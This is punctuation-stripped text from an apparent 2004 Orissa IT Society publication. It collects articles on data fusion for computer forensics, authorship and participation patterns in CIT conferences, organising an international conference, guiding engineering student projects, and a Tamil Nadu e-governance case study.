Feature Extraction and Interpretation

Identify required

data

PROCESS OF DATA FUSION

The fusion process opens a way to reacha better analysis and understanding of the datafrom the viewpoint of accuracy andor reliabilityby providing enhanced information frommultiple sources [1 7 16] When the sensorsprovide information about the same aspect of aspecific entity the redundancy can be used toincrease accuracy and reliability The inherentparallel nature of using the multiple sensorsmeans that these systems usually operate fasterthan a single sensor could One way of accessingthe performance of such type of fusion systemis to measure the enhancement or thedegradation in the information provided by thesystem

Data + Algorithms + Knowledge = Data Fusion

Fusion Techniques

There are various types of fusion techniques

1 Low level fusion2 Medium level fusion3 High level fusion

OITS-2004

19

In CFThe major goal of Computer Forensics is to

develop and apply the scientific methods infinding the solutions driven by practitionerrequirements and addressing the needsconsidering the current paradigms Profilingidentifying tracing and apprehending cybersuspects are the important issues of researchtoday The ultimate goal is to obtain sufficientevidence in order to trace the crime back to thecriminal Within a computer system theanonymity afforded the criminal encouragesdestructive behavior while making it extremelydifficult for Law Enforcers to prove the identityof the criminal Therefore the ability to obtainthe fingerprint of the users is imperative toacquire some hold on identifying the perpetrator

The studies of available Log files alwaysstand as fundamental in evidence collection Butat a higher level it is necessary to possess a morein depth ability to narrow the field or evenestablish a list of possible suspects So the needof the hour is to develop a concept frameworkto assist Law Enforcement and ForensicInvestigating Agencies to gather the digitalevidences against electronic crimes bydeveloping methodology tools technology andprinciples for analysis and examination leadingto PLDE for expert testimony in the Court of Law

Multisensor Data Fusion provides animportant functional framework for buildingAdvanced Security Management systems andcyberspace security awareness A significantchallenge remains for security systems designersto combine the data and information fromnumerous heterogeneous distributed systemsinto a coherent process that can be used toevaluate the security of the cyberspace

Multisensor data-fusion technology is animportant avenue on the road toward the

development of highly reliable security-decisionsystems that identify track and assesscyberspace situations with multiple complexthreats The output of Fusion-based securitysystems will be the estimates of the identity(location) of a threat source the maliciousactivity taxonomy of the threats the attack ratesand an assessment of the potential severity ofthe projected target(s) This information can beused for gathering the Legal Digital Evidence toprovide timely Justice and punish the criminalby efficiently and timely analyzing the cases4 CONCLUSION

There exist significant opportunities andnumerous technical challenges for thecommercial application of Data Fusion theoryinto the art and science of cyberspace securitysystems The data fusion process is in the veryearly stages of technical development Howeveras networks continue to grow and the expandingrealms of cyberspace evolve there will be anurgent need to drive various securitymanagement systems towards next-generationcapabilities Determining the origin of highlysophisticated damage in cyberspace willcontinue to grow in complexity as attackersbecome more cyberspace astute So the futureSecurity systems tracking coordinatedmultifaceted cyberspace attacks require clusteranalysis techniques adaptive neural networksand rule-based knowledge systems

Multisensor Data fusion is a multifacetedengineering approach requiring the integrationof numerous diverse disciplines such asstatistics artificial intelligence signalprocessing pattern recognition cognitive theorydetection theory and decision theory Integratedsensor and decision support tools are emergingrequirements for robust and reliable AdvancedSecurity management systems in complexinternetworks

OITS-2004

20

5 REFERENCES

[1] wwwdatafusionorg

[2] Approaches to improve automation forsecurity Cyber Information Assurance ampDecision Support (CIADS) InformationSystems Laboratory Applied ResearchLaboratories the University of Texas atAustin

[3] Handbook of Computer Crime InvestigationForensic Tools amp Technology by EoghanCasey (Editor) Academic Press 2002

[4] Internet Engineering Task Force NetworkWorking Group Guidelines for the SecureOperation of the Internet RFC1281Available on line ftpinfocertorgpubietfssphwg

[5] Policies to Enhance Computer and NetworkForensics Proceedings of the 2001 IEEEWorkshop on Information Assurance andSecurity United States Military AcademyWest Point NY 5-6 June 2001

[6] Hochberg et al NADIR An automated systemfor detecting network intrusion andmisuse Computers amp Security 1993Elsevier Science New York 235248

[7] D L Hall and J Llinas An introduction toMultisensor data fusion In Proceedingsof the IEEE vol 85 ndeg 1 pp 6-23 1997

[8] L A Klein Sensor and data fusion conceptsand applications Tutorial texts vol TT14 SPIE Optical Engineering Press USA131 p 1993

[9] Waltz E Information Warfare Principles andOperations 1998 Artech House BostonMA

[10] Hall D Mathematical Techniques inMultisensor Data Fusion 1992 ArtechHouse Boston MA

[11]L F Pau Sensor data fusion Journal ofIntelligent and Robotics Systems vol 1pp 103-116 1988

[12] DSTO (Defence Science and TechnologyOrganization) Data Fusion SpecialInterest Group Data fusion lexiconDepartment of Defence Australia 7 p21 September 1994

[13] Varshney P Distributed Detection and DataFusion 1995 Springer-Verlag NewYork NY

[14] Wald L A European proposal for terms ofreference in data fusion InternationalArchives of Photogrammetry and RemoteSensing Vol XXXII Part 7

[15]Cyber Forensics by Simson Garfinkel

[16] Waltz E and Llinas J Multisensor DataFusion 1990 Artech House Boston MA

OITS-2004

21

The Conferences on InformationTechnology or CITs as they are more popularlyknown have been organised by the OrissaInformation Technology Society every year since1998 It was the first ever internationalconference on IT to be held in Orissa and becamean instant hit The overwhelming success of thisedition conveyed the message that not only hadCIT arrived but it was here to stay Apart fromtheir successes academically these conferencesalso present some interesting patterns regardingthe multiplicity of the authors their regions aswell as the areas of research1 Multiplicity of authors

The papers presented in these conferenceshave had authors ranging between one andseven However it has been found that papershaving two and three authors have dominatedwhile papers having five or more authors havebeen few and far between (Fig1) The onlyexception came in the first edition when papershaving two authors comprised more than three-fifths of the total number of papers (Fig2) Thedetails of the multiplicity of authors have beenpresented in Table 1 which is drawn

Interesting Patterns in CITsA Misra

Silicon School of Information TechnologySilicon Hills Patia Bhubaneswar-751031

aurabindasiliconacin

2 Regions of participations In this section we will consider the

participating regions in terms of countries aswell as institutes With India being the hostcountry she has the maximum representationunderstandably But if we look at the trends inthe participation of other countries we can alsoobserve certain interesting patterns

Firstly the United States has the highestrepresentation from overseas having at least oneauthor in thirty-five papers over the six editionsIt is followed by Japan (11) and Australia(10) inthat order (Table 2) It may be noted with interestthat there were three papers from Brazil in the1999 edition but those are the only papers fromBrazil till date Besides there are about twelvecountries which have only one occurrence whileUSA and Japan have been represented in everyedition

However one discouraging factor has beenthe sharp decline in overseas participants overthe six editions (Fig 3) While in the first edition5405 of the papers had at least one overseasauthor the figure has been hovering around the25 mark in the last four editions In spite ofthis 2003 has recorded the highest number ofpapers having overseas particpation ietwenty-one

On the contrary papers from Orissa havebeen increasing steadily every year which hasbeen shown in Fig 4

As far as Institutes are concerned then theIITs have been the most prominent with theexceptions of IIT Delhi and IIT Roorkee whichhave respectively six and one one contributions

Number of authors per paperYear 1 2 3 4 5 6 71998 6 21 8 1 1 0 01999 8 12 13 8 1 2 02000 5 15 12 1 0 0 12001 3 20 24 5 1 0 02002 4 16 17 4 0 2 02003 9 34 33 4 3 0 0

Table 1

OITS-2004

22

Multiplicity patterns

Fig 11998

Fig 2

age of papers involving overseas au thors yearwise

Fig 3Year

Year

OITS-2004

23

till date Leading the pack are IIT Kharagpurwith thirty-five papers and IIT Guwahati withtwenty-seven Among the other IITs IIT Kanpurhas seventeen while IIT Bombay and IIT Madrashave nine apiece Among the other InstitutesJadavpur University has contributed seventeenpapers while University of Hyderabad hascontributed ten The list of the leading Institutesin terms of number of papers alongwith ayearwise breakdown is given in Table 3

Another interesting trend that can beobserved here is that while the USA leadsoverseas list none of the Institutes figure in thelist while one Institute from Japan figures in thelist It can be concluded that the papers from the

Country 1998 1999 2000 2001 2002 2003 TotalUSA 6 10 3 8 1 7 35

Netherlands 2 0 1 0 0 0 3Japan 2 3 1 3 1 1 11

Australia 3 0 1 1 2 3 10Kuwait 1 0 0 0 0 0 1China 1 0 0 0 0 1 2

Sweden 1 0 0 0 0 0 1UK 1 0 0 0 2 3 6

Portugal 1 0 0 0 0 0 1Italy 1 2 1 1 1 0 6

Canada 1 1 0 0 1 3 6Taiwan 0 1 0 0 0 0 1Brazil 0 3 0 0 0 0 3

Finland 0 1 0 0 0 0 1Mexico 0 1 0 0 0 0 1

Germany 0 1 1 0 0 0 2Malaysia 0 0 1 0 1 1 3

Macao 0 0 0 1 0 0 1Thailand 0 0 0 1 0 0 1Norway 0 0 0 1 1 0 2

Singapore 0 0 0 0 1 0 1Serbia amp

Montenegro 0 0 0 0 0 1 1Tanzania 0 0 0 0 0 1 1

Table 2USA have been scattered across the countrywhile those from Japan have been concentratedin some particular Institutes3 The Topics

As far the topics are concernedNetworking leads the table with a total ofthirtythree papers Among other topics ofprominence are Soft Computing with thirty-onepapers Web-based computing with eighteenand Parallel amp Distributed Computing withsixteen papers Even though there have beenpapers from almost all areas of ComputerScience none of those areas have featuredconsistently in these conferences

OITS-2004

24

Trends in papers having authors from Orissa

Fig 4

Bibliography1 Mahapatra RN ed CIT 98 Trends in

Information Technology Tata McGraw-HillNew Delhi

2 Mohanty H and Baral C ed CIT 99 Trendsin Information Technology Tata McGraw-Hill New Delhi

3 Ghosh RK and Misra D ed CIT 2000Proceedings of Third InternationaConference on Information Technology TataMcGraw-Hill New Delhi

Institute 1998 1999 2000 2001 2002 2003 TotalIIT Kharagpur India 5 0 3 8 5 15 36IIT Guwahati India 1 7 4 6 5 4 27

Jadavpur University India 5 3 0 5 2 2 17IIT Kanpur India 3 1 1 6 2 4 17

University of HyderabadIndia 0 1 0 5 1 3 10

IIT Bombay India 1 3 2 1 1 1 9IIT MadrasIndia 0 0 1 2 3 3 9Iwate PrefecturalUniversity Japan 2 1 1 2 1 1 8

Table 34 Pujari AK and Mohapatra P ed CIT 2001

Proceedings of Fourt InternationalConference on Information Technology TataMcGraw-Hill New Delhi

5 Iyer S and Naik S ed CIT 2002 Proceedingsof Fifth International Conference onInformation Technology Tata McGraw-HillNew Delhi

6 Chakraborty G and Sarkar S ed CIT 2003Proceedings of Sixth InternationalConference on Information Technology TataMcGraw-Hill New Delhi

Year

OITS-2004

25

Conference is an academic activity thatallows researchers from a particular field topresent their findings and take suggestions andcomments from peers Academicians who arenot even presenting papers also attend theconference in order to keep themselves abreastof developments in the particular field and alsoto network with other attendees for possibleresearch collaboration In academic world thereis always the pressure of publish or perishConferences are an outlet to help academiciansto publish

While western world has already masteredthe art of holding conferences developingcountries are slowly gearing up to hosting qualityconferences A quality conference in generalrequires both quality and quantity ofparticipation until and unless the conference isvery narrowly focused Holding a conferencerequires quite a bit of pre-preparation andplanning The conference team needs to managethe logistics of interacting with a large numberof authors reviewers invited speakers potentialsponsors and delegates besides maintaining dayto day communication among all the teammembers This article enumerates the strategiesadopted to enhance both the quantity andquality aspect of an international conference1 inthe area of information technology held inDecember 2003 This conference was successfulin terms of participation management and otheraspects as expressed by various attendees of theconference and also in comparison withprevious conferences held by the same group

Experiences amp Learning from Organising anInternational Conference in a Developing Country

Laxman MohantyPhD Scholar BITS-Pilani

T-10 IIM Campus Vastrapur Ahmedabad-380015

Extending the ReachThe first and foremost challenge for a

conference is to reach to potential authors andthen attract as many delegates as possibleThough the particular conference had been heldconsecutively for last 5 years and had created aname for itself still it remained more or lessconfined to members of the parent associationand their friends It was found that faculty ofmany engineering colleges in India were notaware of the conference but on being told aboutit they showed keen interest to participate in itThus to extend the reach of the conferencefollowing strategies were adopted An e-group was created with the e-mail IDs

found from the proceedings of previousconferences Later this group was extendedusing e-mail IDs received from manypostings received in other e-groups likeBytesforall and IDs received from anotherteam member This e-group was used tobroadcast the call for paper (CFP)announcement 2 to 3 times Request was alsomade to members to forward the call forpaper to all people they knew and whowould be interested in the conference

An address list of engineering colleges ofIndia derived from the approved list ofengineering colleges of All India Council ofTechnical Education (AICTE) was preparedThis list was enriched by the addresses ofIndian Institutes of Technology (IITs)National Institutes of Technology (NITs)Indian Institutes of Information Technology

1 The author was the Organising Chair of theConference

OITS-2004

26

(IIITs) all RampD centers of Council ofScientific amp Industrial Research (CSIR) andother special institutions like Center forDevelopment of Advanced Computing (C-DAC) National Center for SoftwareTechnology (NCST) etc This list was usedto send the CFP poster so that facultyconcerned there could participate in theconference

A specific website was registered and usedto disseminate all information regarding theconference This website was also registeredwith several search engines All theconference documents carried the addressof this website The website also carried allcontact details of the organizing team

The website also carried links to four otherrelated conferences happening about at thesame time in the country and similarly thoseconference websites also provided links tothe website of this conference This crosslinking helped all the conferences to beknown to a large number of potentialparticipants

An address list of magazine and journalsrelated to IT and higher education likeUniversity News and Data Quest wasprepared and a brief write up about theconference was sent to those periodicalsMost of these magazines carried theinformation about the conference Thismethod worked well as judged from severalenquiries received which referred to thenews article in University News

Attracting Large Number of DelegatesThe second task was to attract large

number of delegates A focused effort was madefor achieving this Two separate documents wereprepared Advance Program booklet thatcontained details of the technical session and aposter for special events A symposium on ITamp Education industry session on Sustaining

Indias leadership in IT and student tutorialswere organized as three special events to havelarger public participation in the conferenceBoth the Advance Program booklet and theSpecial Events poster were sent by post to theauthors whose papers were selected and thespeakers who were invited for various talksThere were two fold reasons for this strategy 1)Authors and speakers would know details ofthe program and 2) they would use those twodocuments to invite their colleagues to theconference It was assumed that those authorswould take greater interest in spreading theinformation about the conference as comparedto the communication sent as a generic mail tothe head of the institution

The poster which contained details aboutspecific public events was distributed amongthe teachers of schools and colleges industryprofessionals and policy makers in the citywhere the conference was being held It was doneto enhance local participation in those publicevents

The conference was able to attract 246papers from 11 countries and this was almostdouble of what earlier conferences could attractIn fact this large number of papers increasedthe task of the Program Chairs beyondexpectation and they had to recruit morereviewers This also doubled the task ofinforming authors about the status of theirpapers acceptancerejection and finallydirection for final submissionCoordination Among the Organizing Team

The conference team consisted ofprofessionals working in various institutionsspread over different countries like India Japanand USA In India the members were fromdifferent cities Owing to team members beinglocated physically in different places physicalmeeting and planning were eliminatedCyberspace was extensively used to plan and

OITS-2004

27

decide various issues regarding the conferenceThree specific e-groups were created for variousrequirements Egroup1 This e-group contained the e-mail

IDs of the chairs of the conference It wasused to appraise other members regardingwho is doing what Also suggestions weresought for various issues such as publishersto be approached for proceedings who wereto be invited for keynote and special talksand which places to be included in the sightseeing tour etc

Egroup2 This e-group was a super set ofegroup1 and contained e-mail IDs of chairsof the present conference and the pastconferences It was assumed that this groupby being involved in 6 editions of thisconference (including the current one) helda large knowledgebase that can be used tosort out various policy issues regarding theconference For example issues likeregistration fee what type of tutorials andwhat facilities to be extended to variousinvited speakers were discussed anddecided upon through this e-group

Egroup3 This e-group comprised of themembers of the parent association of theconference This e-group was used to keepthe group members informed about thedevelopments of the conference and alsogalvanize support for participation andpublicity

Several members of the parent associationobserved during the conference that though theywere not actively contributing to any discussionin the e-group yet they were happy to get allstatus reports about the conference and be partof the discussions among the members

Besides these groups a large number of one-to-one and one-to-many e-mail exchanges weremade to facilitate information sharing anddecision making

It may be noted that the organizing team ofthe conference acted more like a virtual team withmembers physically located at various placesin the world Interestingly many members didnot know other members personally Thus it wasdecided that in the website the name of eachconference chair will be linked to hisherpersonal web pages so that other members canlook at those pages and become familiar withthe persons they are workingReviewing the Papers

Receiving papers reviewing theminforming the authors about the acceptancerejection of their papers and finally receivingthe camera ready papers are some of the criticalfunctions that needed to be done with great careCyberspace was extensively used to carry outthese activities thus making execution of tasksfaster accurate and inexpensive Though therewas no facility for online submission authorscould e-mail their papers to either of the ProgramChairs Each paper was to be reviewed by atleast two reviewers Private HTML pages werecreated to facilitate this review process TheseHTML pages carried the following informationabout the papers submitted - numbers titleswhether reviewers found or not for a given paperand if found whether two reviewers were foundReviewers were given the access to those pagesand were asked to select the papers which wereyet to be allotted for review and the ones theywould like to review They could then downloadthe concerned papers for review E-mails wereused to receive reviews from the reviewers andcommunicate the same to authors withselection rejection status of their papers Finalpapers were also received through e-mails fromthe authorsDelegation

Though the committee of chairs wasresponsible for all basic activities yet it was notpossible for this committee to handle allresponsibilities especially those related to local

OITS-2004

28

arrangements Thus a committee of coordinatorsfor various activities was formed to handlevarious sub functions For example acoordinator was especially designated to lookafter accommodation and local conveyance ofguest speakers and delegates The conferencewas providing accommodation to around 20 oddguest speakers and they were to reach the venueat different dates and times and from differentcountries Receiving them putting them up inhotels and enabling them to reach the conferencevenue were all complex tasks and needed fulltime attention of one person

Besides accommodation and localconveyance there were coordinators forregistration arrangement at the conferencevenue poster session and special programs etcThe details of this coordination team were putup on the website and delegates were informedthrough e-mails to get in touch with the relevantcoordinator for their queries and requirementsThe coordinators were the faculty members ofthe host college and each coordinator wasassisted by a team of student volunteers fromthe same college

This arrangement not only ensured smoothfunctioning of the conference it increasedinvolvement of a large number of facultymembers The coordinators also appreciated therecognition they received For student volunteersit was a great learning opportunityExtending the Scope of the Conference

By nature a conference is an academicfunction and only involves researchers andacademicians from different institutions But thisconference was designed also to accommodatestudents industry representatives and teachersfrom schools and colleges Three special eventswere organized for this target group asymposium for educators an industry sessionfor students researchers and teachers andtutorials specially designed for students Allthese sessions were very successful and attracted

a large number of participants from the city Thusthe conference could benefit the community inthe local contextThe Financing Model

The conference also had a unique financingmodel Its registration fee was kept sufficientlylow to attract large number of participants Thusthe registration fees alone were not sufficient tomeet all the expenses Though the conference isorganized by an association in reality a localengineering college takes the lead every year inhosting it while other colleges provide financialsupport So a large part of the financialrequirement was met by the contribution fromthe local engineering colleges In return thesecolleges were given free registration for certainnumber of participants in the conference andthe tutorials

Tutorials were designed in such a way(content duration course materials and otherfacilities wise) that participants would not mindpaying to attend them Independentsponsorships were sought from local collegesfor special events and this was acknowledgedduring the event Besides association membersstaying abroad were able to garner a large chunkof financial support from some corporates Govtorganization like CSIR also extended somesupport The conference was able to generate asmall surplus besides meeting all its needs Thissurplus is given to the parent association to carryout computer awareness activitiesConclusion

The whole experience of being part of theorganizing team that carried out planningdesigning and organizing of the conferenceshowed that by bringing in innovation todifferent dimensions of the conference a teamcan not only enhance both the quality andquantity of participation among variousstakeholders it can turn the whole experienceinto an enriching and fun filled experience

OITS-2004

29

Guiding Seminars and Projects for UndergraduateEngineering Students

MN DasProfessor amp HOD

Computer Science amp Engineering and IT

IntroductionConduct seminar presentation and projects

for undergraduate engineering students in theirfinal year is an important and statutory part ofany university curriculum Seminar measuresmostly the external abilities and projectmeasures the internal abilities of a studentThrough seminar besides the technicalknowledge the presentation communicationand interpersonal skills of a student also getreflected Through project the depth of technicalknowledge acquired amp degree of understandingon fundamentals of engineering subjects by thestudent get evaluated Also to some extent thepresentation skills of a student gets reflect whenhe or she submits the project report and presentsbefore the audience (examiners studentcolleagues etc) A student goes through varietiesof engineering subjects (both theory andsessional) during his or her engineering studtyThese papers are mainly divided into twocategories (i) Core papers amp (ii) Supportingpapers Seminars and projects are based on thethorough understanding of all these papers bythe students Besides these course curriculumknowledge the projects amp seminars are alsobased on the extra or additional knowledgeacquired by the students by going throughvarious journals magazines research papersCDs internet amp reference books etc and byattending several tutorials workshopsseminars conferences symposiums andtechnical competitions etc

In short seminar and project are one typeof indicators of a students mental capability and

orientation to face and accept the practical andtechnical challenges in the real scenarios infuture

Role of faculty members as guides aco-guides

A student needs active support from his orher guide or co-guide for preparing himself orherself to present seminar and carrying out aproject work successfully Normally this guideis one of the faculty members of the concerneddepartment But some cases when a studentcarries out a project work in an organizationother than his or her institute a member of thatorganization becomes the guide However inthat case one of the faculty members of thedepartment must become a co-guide The role orthe co-guide is very important in the sense thathe or she has to orient the project done by thestudents as per the University guidelines Aseminar can be presented individually or ingroup (normally no of group members shouldnot exceed 3) Each Seminar team (either onemember or multiple members) must be linkedwith a guide called seminar guide Similarly aproject can be done individually or in group(normally no of group members should notexceed 5) Each project team (either one memberor multiple members) must be linked with a guideor co-guide called project guide or project co-guide Selecting a guide by a student group orvice versa is normally done through mutualconsultation Head of the department can playthe role of a negotiator in this situation For abetter focus and attention no of project teamsunder the supervision of a project guide or co-

OITS-2004

30

guide should not exceed 2 and no of seminarteams under the supervision of a seminar guideshould not exceed 4 Each group (either projector seminar) must submit an abstract or synopsisof the work to be done or presentation to be madeto their respective guides sufficiently before thecommencement of project work or seminarpresentation Seminar guides must ensure thattopics of seminars are of advanced amp state-of-the-art type These topics should not be from theUniversity course curriculum but can be basedon the basics of these subjects A schedule forthe seminar presentations should be notified byHOD to all concerned in a tabular manner withthe following fields representing the columns

rapport with them by directly speaking andby using proper eye contact A keennessshould be shown to them that thispresentation is for their learning amp benefitonly

b) The Middle bit is usually longest and canhave several sections This is structured witha logical sequence Movement from one areaor topic to another is done using verbal orvisual links OHP or LCD acetates are usefulfor breaking the middle bit up into smallerchunks

c) The End of the presentation should be asummary a conclusion a logical end to whathas gone before

iii) PracticeA number of practices should be made

about the presentation in front of the mirror infront of the cat before friends amp on ones ownetc If possible the audio visual equipments likeOHP LCD etc can be tried out before the actualday of presentations During practice feed backcan be obtained from friends regarding thespeaking speed (ie whether too fast or too slow)the visual aids (whether clear or not) logicalmovement of sequence (whether correct or not)amp overall performance (whether excellent goodor poor etc)

Following hints amp tips may be followedduring practice or at the time of actualpresentation Breathe slowly it calms you down Speak audibly but dont shout Speak at normal pare not very fast not

very slow Speak clearly Be enthusiastic Avoid using jargons and colloquialisms

unless these are familiar to the audience Be aware of your gestures

Date Time Slot Group Title of Formatof topic presentation

(LCD OHP)

Guidelines for Seminar Presentation3 PS Preparation Planning amp practicei) PreparationPreparation for seminar presentation can

be effectively done if the following questions areasked to themselves by the students concerned What do I want the audience to LEARN or

DO as a result of my presentation How can I keep the audience interested Do I know my subject

Fundamental rule is that keep itstraightforwardly simple which is abbreviatedas KISS

ii) Planning-Any form of communication should have

a structure Beginning a Middle bit and anEnda) The Beginning should tell the audience

what the presenter(s) is going to tell them Itshould be positive Presenter should engagethe audiences attention and establish

OITS-2004

31

Use large fonts if LCD or OHP are beingused

Learn from watching others follow thestrength amp reject the weaknesses of otherspeakers

Use lots of figures diagrams charts ampgraphs etc

Point to the projection (screen) not thesource

Maintain the timing perfectly

Guidelines for Project Presentation(We have assumed that project guides

project teams amp topics of the projects havealready been finalized)1st Step- Write the abstracts or synopsis of theproject2nd Step- Set a realistic timeframe

Assuming 100 effectives working days ina semester the following is a sample break upDefine your problem - - - - - - - -Write a proposal - - - - - - - -- - -Develop your solution - - - - - - -Implement your solution - - - - -Present your solution - - - - - - -Submit the project report - - - - -3rd Step-

Make proper evaluation amp assessment ofperformance of the students on the basis of finalproducts (results reports and presentation) andthe process by which they were attained Thegrade is given for the entirety of the project Asample grade system may be as followsA a consistently excellent effort that attains

project goalsB a consistently good effort that attains project

goalsC an acceptable effort that at least partially

attains the project goals

D an inconsistent or unsatisfactory effort thatonly partially attains project goals

F an unsatisfactory effort that does not attainproject goals

Tips for writing project reports 1) Sketch the outline of the project2) Expand your outline3) Write your paper4) Rewrite until you get it right

A sample outline for project reports Introduction Background Design Implementation System in Action Results Future work Conclusion ReferenceBesides these the cover page design

acknowledgement topic index index for figuresamp tales etc can be added at proper locations ofthe project report

ConclusionSince projects amp seminars are indicators of

internal amp external abilities of the engineeringstudents the respective faculty guides or co-guides must motivate their students in such amanner that they do not resort to any kind offalse means for carrying out these two mostimportant activities of their student carrer

20 days

20 days

60 days

About the author Prof MN Das is currently Professoramp HOD in the Department of Computer Science ampEngineering at KIIT Deemed University After completinghis BE in Electronics amp Telecommunication branch in1987 from UCE Burla he was with ECIL Hyderabadfor few months in its computer group Then he joinedas a lecturer in the Dept of Electronic amp Tele commengineering dept of UCE Burla and continued upto1987 He completed his ME in Electronics systems ampcommunication during this period He then joined OrissaState Electronic Development Corporation (OSEDC) Ltdfor 1987 amp continued upto 2002 During that period hecompleted his PG Diploma in Management atXIMBAfter a long 16yrs inducted experience in various areashe joined KIIT Deemed University from 2002 onwards

OITS-2004

32

Information and CommunicationTechnology (ICT) has today become an integralpart of governance especially in India ICT isviewed as a tool that will help deliver servicesboth in the public and the private sector to theubiquitous common man What used to takeyears to compile and analyse now takes just afew seconds or minutes

E-governance as a concept involvesleveraging ICT to streamline the administrativeprocess it involves computerisation of recordsfacilitating efficient transactions betweenvarious government departments networkingoffices and using websites and e-mail to bringadministrators closer to people

In the past decade e-governance has beena popular buzzword among politicians andbureaucrats alike especially in India One quasi-Government organisation in Tamil Nadu hasdecided to go the distance by implementing e-governance at a micro level their office is nowcompletely paperless and file-transfer takesplace in an electronic format

Using a tool aptly titled e-Administration Chennai-based ElectronicsCorporation of Tamil Nadu Ltd (ELCOT) withthe help of an Information and CommunicationTechnologies (ICT) organisation called Life-Lineto Business (LL2BCOM) has introduced aworkflow and document management processsans physical movement or use of paper

Designated by the Government of TamilNadu to promote IT industries in the stateELCOT besides supporting IT entrepreneurs also

Case study on ICT and e-GovKrishnan V D G

ICT amp e-Gov Specialistkrisdevgmailcom

promotes joint ventures in electronicscommunication and IT They also help developinfrastructure for the software industry in theform of IT parks and by providing effectivecommunication backbones

LL2BCOMs e-Administration toolallows ELCOT officials to sanction purchasesapprove official activities and transfer filesflawlessly in completely electronic format Witha view to introduce transparency in theirworkflow process all the files processed in theorganisation are made available on a centralserver while the status of pending files can beobtained at any stage There is no physicalmovement of files at any stage only the finalorder copies are printed and stored as physicalrecord

The Nuts and BoltsAs part of its e-governance initiative the

Government of Tamil Nadu embarked on apaper-less office drive for introducingtransparency and accountability in its internaland external transactions

ELCOT the nodal organization for ITactivities in the state decided to introduce e-Administration a paperless FileManagement System which ensures speedydisposal of files The entire process creationmovement monitoring and approval of filestakes place electronically resulting in betterutilisation of manpower This helps avoidingdelays which leads to better governanceaccording to Sudeep Jain IAS MD ELCOT

OITS-2004

33

e-Administration is the brainchild of ICTand e-Gov specialist VDG Krishnan who hasover a quarter of a century hands-on managerialexperience in the Public Sector in India and aleading MNC in North South America He isthe Founder President of Life-Line to Business(LL2BCOM Pvt Ltd) His urge was to developa simple yet effective solution that can help totransform the Governments Corporates SMEsand NGOs The tool was conceived by him afterhis return to India as an apt solution for e-Governance in the developing world based onhis experience in both the developing and thedeveloped world

e-Administration is a web-enabledplatform-independent paperless solutiondeveloped on an Open Source platform forpaperless communication within and outsidean organization It uses open source offeringssuch as J2EE JBOSS PGSQL all running onLinux

The tool according to Krishnan canreduce the cycle time for file approval from anaverage of two to three weeks to one week Thiscan also result in a considerable reduction ofpaper-usage within an organisation therebysaving valuable natural resources

According to Krishnan LL2Bs toolempowers every employee in the organizationto discharge his or her duties efficiently It hasalso reduced the dependence on subordinatesand makes the organization system-orientedrather than people-centric This is likely to resultin increased productivity

Being a Linux platform local languagecontent can also be easily added This tool canbe used by any organization whose activitiesinvolve dealing with multiple agencies forsimultaneous review and action The tool also

aids knowledge management and integrationin NGOs for self-assessment decentralised fieldupdating and centralised review andmonitoring

The ProcessELCOT conducted trials with products

offered by four to five SMEs for independentevaluation with a view to adopt the best toolThe SMEs were asked to implement thenecessary customisations to suit therequirements of ELCOT Govt

Trials were conducted over three to twelvemonths with equal opportunity given to all thevendors In each department one system wasconfigured as the server and five nodes (on anaverage) connected as clients for live testing

Says K Appuswamy General Manager (e-Governance) Many organizations hadconducted trials but only LL2Bs model workedsuccessfully at ELCOT

LL2BCOMs product was one of the fiveLAN based solutions tried out the front-endwas based on Visual Basic while the backendwas Microsoft Access SQL running on aMicrosoft Windows 2000 server in the initialtrials This tool was initially installed inELCOTs Marketing Department for about 5officers Seeing the effective use of the tool moreofficers and staff came forward voluntarily touse the tool Steadily the number was increasedand the solution upgraded to a browser basedweb version for removing the dependence onclient systems

Currently e-Administration systemconnects about 150 users in three differentlocations spread over a distance of about 25 KMsincluding their Corporate Office at Nandanamtheir Communication Division at Perungudy

OITS-2004

34

and their Chairman Mr Vivek Harinarain IASwho is the Secretary IT Govt of Tamil Nadu atthe Secretariat through a dedicated powerfulfour-way Xeon dual Processor with RAIDfacility running a versatile Oracle 9i databaseas backend on Linux advanced server centrallylocated at ELCOT Corporate office

The tool simplifies the process of generatingfiles and enables moving note sheetselectronically for approval Instead of physicallycarrying note sheets for approval from table totable the employees began using the tool Receiptof the e-document was indicated by pop-up alertmessages on the officers monitors

All letters received from external agenciescould now be scanned and converted intoelectronic documents which would then beadded to the central repository This systemenables a user to check the status of a file at anystage More importantly delays are minimisedas the files can be traced instantly through thenetwork employees can now know whichofficer has kept the file pending

The biggest advantage of e-Administration is that it enables us to view atany stage the status of pending file The detailsare available on a central server and can beaccessed by anyone having the authority Thisway workflow is simplified

LL2Bs e-Administration tool not onlyeffects a dramatic reduction of stationary usageand time taken to process documents it alsoserves to introduce transparency in the workingof any organisation

The employees of ELCOT also took to thesystem rather well According to AppuswamyOur employees became more and morecomfortable with using the tool as the trialsprogressed Its quite user-friendly and doesnt

require a lot of technical expertise I myself beganusing the system without any formal trainingand have been using it successfully for eightmonths now

AccoladesAt the 7th National e-Gov conference held

in Chennai in November 2003 MD ELCOTreceived a merit citation award from Governmentof India for implementation of e-Administration as a tool for e-Governance

The Industrial Guidance Bureau of theGovernment of Pondicherry has implementedan integrated e-Platform a quickly customizedsolution of e-Administration to automate theactivities of the Department of Industries andCommerce (Refer Budget 2004-2005 Addressof HE the Lt Governor Pondicherry httpwwwp on nic inopend eptsf in anc elgspeech2004pdf)

Item 7 of the speech reads as followsRemoval of poverty may not be

practically possible without focusing specialattention on creation of gainful jobopportunities The Tenth plan at the nationallevel envisages creation of 50 million newemployment opportunities over a period of fiveyears Therefore focused attention will be givento few critical sectors such as

Industries Information Technology etcwhich have very high employment potential

Item 19 of the speech reads as followsThe manufacturing sector of the economy

has potential to absorb the surplus labour forceThe labour intensive manufacturing units canprovide gainful job opportunities for skilled aswell as semi-skilled labour force We willcontinue to encourage new entrepreneurs tochoose Pondicherry as their destination for

OITS-2004

35

establishing new industrial units andprocedures will be simplified to obtain licence permission to start units We will continue topursue the policies of promoting pollution freeless water and less power consuming industriesin our Union Territory

Item 20 of the speech reads as followsIndustrial Guidance Bureau with

integrated e-Platform has been established bysubstituting single window clearance system tospeed up the process of industrial clearance permission for setting up of new industrial unitsA total of 21 Departments includingMunicipalities Commune Panchayats havebeen integrated with a dedicated electronicnetwork for granting permission to set up anindustry and also to commence production

This saves a lot of time effort and cost toindustrialists and citizens as well as officials ofvarious Departments As against submitting 10copies of documents in the manual system inthe electronic system only one signed copy needsto be submitted thereby saving 90 of paperresulting in conserving of natural forestresources

